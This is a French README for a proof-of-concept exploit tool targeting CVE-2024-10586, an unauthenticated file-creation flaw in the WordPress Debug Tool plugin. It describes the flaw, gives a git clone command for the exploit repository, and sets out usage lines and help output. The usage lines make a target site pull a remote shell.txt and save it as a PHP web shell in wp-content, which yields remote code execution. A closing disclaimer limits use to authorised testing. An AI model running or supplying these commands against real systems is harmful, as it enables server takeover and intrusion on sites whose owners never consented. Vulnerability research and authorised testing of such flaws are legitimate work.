
Exploit de preuve de concept pour CVE-2024-10586 ciblant le plugin WordPress Debug Tool. Automatise le téléversement de fichiers arbitraire conduisant à une exécution de code à distance via des requêtes POST non authentifiées.
Description
Le plugin Debug Tool pour WordPress est vulnérable à la création arbitraire de fichiers en raison d'un manque de vérification des capacités sur la fonction dbt_pull_image() et d'un manque de validation du type de fichier dans toutes les versions jusqu'à la version 2.2 incluse.
Cela permet à des attaquants non authentifiés de créer des fichiers arbitraires tels que des fichiers .php qui peuvent être exploités pour exécuter du code à distance.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
Exécutez le script avec la commande suivante : python CVE-2024-10586.py -u -r -p <Chemin du shell (optionnel)>
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
Ce script est fourni à des fins éducatives uniquement. Utilisez-le de manière responsable et uniquement sur des systèmes qui vous appartiennent ou pour lesquels vous avez explicitement l'autorisation de tester. Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par cet outil.